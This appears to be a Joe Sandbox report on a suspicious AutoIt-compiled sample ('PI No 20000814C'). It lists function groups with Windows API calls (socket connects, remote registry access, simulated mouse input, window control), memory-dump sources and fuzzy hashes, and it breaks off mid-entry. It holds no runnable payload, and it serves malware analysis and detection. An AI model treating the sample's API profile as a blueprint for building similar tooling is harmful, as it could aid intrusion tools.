                                    • Instruction ID: 74d4fe07117a8e25be695d8f617b9659565fe395101185c996d1421aabbc75b3
                                    • Opcode Fuzzy Hash: 637f25b946fa58255a0a225dbf20dc87623b7ca522c77082cb066c364ef4cc79
                                    • Instruction Fuzzy Hash: F8310CB1D0111DBFDB15AB90DC89EFEB7BCFB08310F100269E505E2151DA749E8AABA0
                                    APIs
                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00F8655B
                                    • GetWindowLongW.USER32(01983AE0,000000F0), ref: 00F8658E
                                    • GetWindowLongW.USER32(01983AE0,000000F0), ref: 00F865C3
                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00F865F5
                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00F8661F
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00F86630
                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00F8664A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: LongWindow$MessageSend
                                    • String ID:
                                    • API String ID: 2178440468-0
                                    • Opcode ID: e972ff1516be53941facf45afd0bf3b704a1f2bf3aa662c211e1ec257bce209c
                                    • Instruction ID: 8f650f6e27974cbd2cdae9e15caa77c7c6f236a8a136dda3dc888b334ca0a6a0
                                    • Opcode Fuzzy Hash: e972ff1516be53941facf45afd0bf3b704a1f2bf3aa662c211e1ec257bce209c
                                    • Instruction Fuzzy Hash: 4B31F271A04258AFDB209F18DC86FA53BE1FF4A724F1902A8F511CF2B5DB61A844EB51
                                    APIs
                                      • Part of subcall function 00F780A0: inet_addr.WS2_32(00000000), ref: 00F780CB
                                    • socket.WS2_32(00000002,00000001,00000006), ref: 00F764D9
                                    • WSAGetLastError.WS2_32(00000000), ref: 00F764E8
                                    • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00F76521
                                    • connect.WSOCK32(00000000,?,00000010), ref: 00F7652A
                                    • WSAGetLastError.WS2_32 ref: 00F76534
                                    • closesocket.WS2_32(00000000), ref: 00F7655D
                                    • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00F76576
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                    • String ID:
                                    • API String ID: 910771015-0
                                    • Opcode ID: f96bc77f7a22af45556041a7bed4d5b9506f7ce0671aa473b0526c44f2696230
                                    • Instruction ID: 4f7a5fc39afe1324342ae2e23c041dc46aef20b89eb2b7b2cf0c292c966c663c
                                    • Opcode Fuzzy Hash: f96bc77f7a22af45556041a7bed4d5b9506f7ce0671aa473b0526c44f2696230
                                    • Instruction Fuzzy Hash: B931A131600518AFDF10AF24CC85BBE7BA9EB44724F04802AFD09D7291DB74AD09FB62
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: __wcsnicmp
                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                    • API String ID: 1038674560-2734436370
                                    • Opcode ID: c7f8e593f307de0fa455523e986f8946a9df97055fb6dcb1aae5269e646d66ba
                                    • Instruction ID: 9c47452b931ad899715137c208c05fb2dac89b8c5d0186fdfada5613de097c6e
                                    • Opcode Fuzzy Hash: c7f8e593f307de0fa455523e986f8946a9df97055fb6dcb1aae5269e646d66ba
                                    • Instruction Fuzzy Hash: 96217C72900266B6D330F630ED12FA77398EF51311F144075FE8687181EB58AE8EF295
                                    APIs
                                      • Part of subcall function 00F01D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F01D73
                                      • Part of subcall function 00F01D35: GetStockObject.GDI32(00000011), ref: 00F01D87
                                      • Part of subcall function 00F01D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F01D91
                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00F878A1
                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00F878AE
                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00F878B9
                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00F878C8
                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00F878D4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessageSend$CreateObjectStockWindow
                                    • String ID: Msctls_Progress32
                                    • API String ID: 1025951953-3636473452
                                    • Opcode ID: f1f8e3d6894d821c778e30b4507d89812b04d1472626b42859a6853a0dd22667
                                    • Instruction ID: 1b8fd4ae6f98c65d1cf09ebd443f41e76a9b6927ebeabbd4ca2c1b8f889b05fd
                                    • Opcode Fuzzy Hash: f1f8e3d6894d821c778e30b4507d89812b04d1472626b42859a6853a0dd22667
                                    • Instruction Fuzzy Hash: 091163B2554219BFEF159F60CC85EE77F5DEF08768F114115B604A6090CB719C21EBA4
                                    APIs
                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 00F241E3
                                    • GetProcAddress.KERNEL32(00000000), ref: 00F241EA
                                    • RtlEncodePointer.NTDLL(00000000), ref: 00F241F6
                                    • RtlDecodePointer.NTDLL(00000001), ref: 00F24213
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                    • String ID: RoInitialize$combase.dll
                                    • API String ID: 3489934621-340411864
                                    • Opcode ID: 4b197ce9d667cbadab0bf802673df7bf35dd6812f3ca90ed536ccb1cbee26c45
                                    • Instruction ID: da11da36ae4e369ace1232508bbd93d266e13ccc0baa93c4640c26c077434959
                                    • Opcode Fuzzy Hash: 4b197ce9d667cbadab0bf802673df7bf35dd6812f3ca90ed536ccb1cbee26c45
                                    • Instruction Fuzzy Hash: 17E01AB0A90308AFEF225BB1ED1EF643AA4B721B02F144424B451D60E0DBB56099BF00
                                    APIs
                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00F241B8), ref: 00F242B8
                                    • GetProcAddress.KERNEL32(00000000), ref: 00F242BF
                                    • RtlEncodePointer.NTDLL(00000000), ref: 00F242CA
                                    • RtlDecodePointer.NTDLL(00F241B8), ref: 00F242E5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                    • String ID: RoUninitialize$combase.dll
                                    • API String ID: 3489934621-2819208100
                                    • Opcode ID: 3e5a09c199db358431e53ae33c0a70125fa96f747d02c91c94ed8dfb62fc10bd
                                    • Instruction ID: c0fc64b496e4a1deadbe90b93bc5e0005ce8a3678e0a400aec25cb06d3603f55
                                    • Opcode Fuzzy Hash: 3e5a09c199db358431e53ae33c0a70125fa96f747d02c91c94ed8dfb62fc10bd
                                    • Instruction Fuzzy Hash: FDE0B678A91318EFEB519B62FE1EF953AA4B724B42F144029F041E20A0CBB4A548FB15
                                    APIs
                                    • __WSAFDIsSet.WS2_32(00000000,?), ref: 00F76F14
                                    • WSAGetLastError.WS2_32(00000000), ref: 00F76F48
                                    • htons.WS2_32(?), ref: 00F76FFE
                                    • inet_ntoa.WS2_32(?), ref: 00F76FBB
                                      • Part of subcall function 00F5AE14: _strlen.LIBCMT ref: 00F5AE1E
                                      • Part of subcall function 00F5AE14: _memmove.LIBCMT ref: 00F5AE40
                                    • _strlen.LIBCMT ref: 00F77058
                                    • _memmove.LIBCMT ref: 00F770C1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                    • String ID:
                                    • API String ID: 3619996494-0
                                    • Opcode ID: 1e67ea3a2c6e18c1950a52d7088a32f31b750077fdeafd9afa2e47c6de876f58
                                    • Instruction ID: 3d266ee49446db51db2548d778aa570c3ed05824cf0a01a2e037cc66561bd9c7
                                    • Opcode Fuzzy Hash: 1e67ea3a2c6e18c1950a52d7088a32f31b750077fdeafd9afa2e47c6de876f58
                                    • Instruction Fuzzy Hash: 4F81D271508300AFD710EB24CC85F6BB7E9AF84724F10851DF5599B2E2DB74AD05EB52
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _memmove$__itow__swprintf
                                    • String ID:
                                    • API String ID: 3253778849-0
                                    • Opcode ID: 08925d99e4a2ba070978e6d27493ca70a0b04bf08e83e741c3cfa716157a97dd
                                    • Instruction ID: 64459a0b6223721370a3d3f8cc8e7543644a9847bbf38e481539b276cb9eca39
                                    • Opcode Fuzzy Hash: 08925d99e4a2ba070978e6d27493ca70a0b04bf08e83e741c3cfa716157a97dd
                                    • Instruction Fuzzy Hash: 8E61AC3190429A9BCF11EF64CC81EFE77A4AF44318F044559FC55AB1D2EB78A905FB90
                                    APIs
                                      • Part of subcall function 00F07F41: _memmove.LIBCMT ref: 00F07F82
                                      • Part of subcall function 00F810A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F80038,?,?), ref: 00F810BC
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F80548
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F80588
                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00F805AB
                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F805D4
                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F80617
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00F80624
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                    • String ID:
                                    • API String ID: 4046560759-0
                                    • Opcode ID: b93664b093fe8873bb8cfed6a538a78113941bf7dbf1c5803280485ddf116adf
                                    • Instruction ID: 7d4e3e3d334547380324239ecc0b9f062da6e62588396836981ac78ae240196f
                                    • Opcode Fuzzy Hash: b93664b093fe8873bb8cfed6a538a78113941bf7dbf1c5803280485ddf116adf
                                    • Instruction Fuzzy Hash: 8D516A31608300AFCB14EB14CC85EABBBE8FF88714F44491DF5558B1A1DB75E909EB52
                                    APIs
                                    • GetMenu.USER32(?), ref: 00F85A82
                                    • GetMenuItemCount.USER32(00000000), ref: 00F85AB9
                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00F85AE1
                                    • GetMenuItemID.USER32(?,?), ref: 00F85B50
                                    • GetSubMenu.USER32(?,?), ref: 00F85B5E
                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 00F85BAF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Menu$Item$CountMessagePostString
                                    • String ID:
                                    • API String ID: 650687236-0
                                    • Opcode ID: 56f965be162775fc1b0b99145f041880e7d234da1e59130d6391338e96671e24
                                    • Instruction ID: 9fb01f3a7e0c530be96a810890b67b96c68d3410f35827443fa93b2a8de79ed9
                                    • Opcode Fuzzy Hash: 56f965be162775fc1b0b99145f041880e7d234da1e59130d6391338e96671e24
                                    • Instruction Fuzzy Hash: 96517231E00615EFCF15EFA4C845AEEB7B5EF58720F104459E811BB351DB78AE41AB90
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 00F5F3F7
                                    • VariantClear.OLEAUT32(00000013), ref: 00F5F469
                                    • VariantClear.OLEAUT32(00000000), ref: 00F5F4C4
                                    • _memmove.LIBCMT ref: 00F5F4EE
                                    • VariantClear.OLEAUT32(?), ref: 00F5F53B
                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00F5F569
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Variant$Clear$ChangeInitType_memmove
                                    • String ID:
                                    • API String ID: 1101466143-0
                                    • Opcode ID: 4ff2360ff30e52ed33a5a3814703d7465f5a02945ef2342295053052ae22be2a
                                    • Instruction ID: af8080e6f470eb08c88f63d1603339ef827333d14cfbc59265a465c60a8c8ede
                                    • Opcode Fuzzy Hash: 4ff2360ff30e52ed33a5a3814703d7465f5a02945ef2342295053052ae22be2a
                                    • Instruction Fuzzy Hash: EF516CB5A00209DFCB10CF58D884AAAB7B8FF4C354F15856AEE59DB340E730E915CBA0
                                    APIs
                                    • _memset.LIBCMT ref: 00F62747
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F62792
                                    • IsMenu.USER32(00000000), ref: 00F627B2
                                    • CreatePopupMenu.USER32 ref: 00F627E6
                                    • GetMenuItemCount.USER32(000000FF), ref: 00F62844
                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00F62875
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                    • String ID:
                                    • API String ID: 3311875123-0
                                    • Opcode ID: ef3f1847cbff8d5711b2c4763c3337f522cc6445003feaecb978de3dafbb727e
                                    • Instruction ID: 3e329c9028064d36f4abf31c93b07012a74be927d9858d759f10b5b2eb572912
                                    • Opcode Fuzzy Hash: ef3f1847cbff8d5711b2c4763c3337f522cc6445003feaecb978de3dafbb727e
                                    • Instruction Fuzzy Hash: 5D518B70E00A0AEFDF64CF78DC88BAEBBF4AF44324F14416AE8119B291D7749944EB51
                                    APIs
                                      • Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623
                                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 00F0179A
                                    • GetWindowRect.USER32(?,?), ref: 00F017FE
                                    • ScreenToClient.USER32(?,?), ref: 00F0181B
                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00F0182C
                                    • EndPaint.USER32(?,?), ref: 00F01876
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                    • String ID:
                                    • API String ID: 1827037458-0
                                    • Opcode ID: 7515686518e9a0ed38b80b9ffdbc8a89e9fce5082f82f0a79d0d801d722928ea
                                    • Instruction ID: 9a8edd6063876aa43cd23154ee34ee0f0deb7ec1089fc6ed34e0740552e8a50e
                                    • Opcode Fuzzy Hash: 7515686518e9a0ed38b80b9ffdbc8a89e9fce5082f82f0a79d0d801d722928ea
                                    • Instruction Fuzzy Hash: B6416571604204AFDB10DF24CC89FBA7BE8BB49724F044628FAA4C62E1C7259949FB61
                                    APIs
                                    • ShowWindow.USER32(00FC67B0,00000000,01983AE0,?,?,00FC67B0,?,00F8B862,?,?), ref: 00F8B9CC
                                    • EnableWindow.USER32(00000000,00000000), ref: 00F8B9F0
                                    • ShowWindow.USER32(00FC67B0,00000000,01983AE0,?,?,00FC67B0,?,00F8B862,?,?), ref: 00F8BA50
                                    • ShowWindow.USER32(00000000,00000004,?,00F8B862,?,?), ref: 00F8BA62
                                    • EnableWindow.USER32(00000000,00000001), ref: 00F8BA86
                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00F8BAA9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Window$Show$Enable$MessageSend
                                    • String ID:
                                    • API String ID: 642888154-0
                                    • Opcode ID: f04233dea95c789fd4e3f50f0a5358a37a650c315f8dbd21131d6f325cc2b72e
                                    • Instruction ID: c106827eba44794683b83efe65708c232c8c54a81e2be0a737e9b8da525703b6
                                    • Opcode Fuzzy Hash: f04233dea95c789fd4e3f50f0a5358a37a650c315f8dbd21131d6f325cc2b72e
                                    • Instruction Fuzzy Hash: 0E416130A00245EFDB25DF14C489BE57BE0FF05321F1842B9EE588F2A2C735A849EB51
                                    APIs
                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,00F75134,?,?,00000000,00000001), ref: 00F773BF
                                      • Part of subcall function 00F73C94: GetWindowRect.USER32(?,?), ref: 00F73CA7
                                    • GetDesktopWindow.USER32 ref: 00F773E9
                                    • GetWindowRect.USER32(00000000), ref: 00F773F0
                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00F77422
                                      • Part of subcall function 00F654E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F6555E
                                    • GetCursorPos.USER32(?), ref: 00F7744E
                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00F774AC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
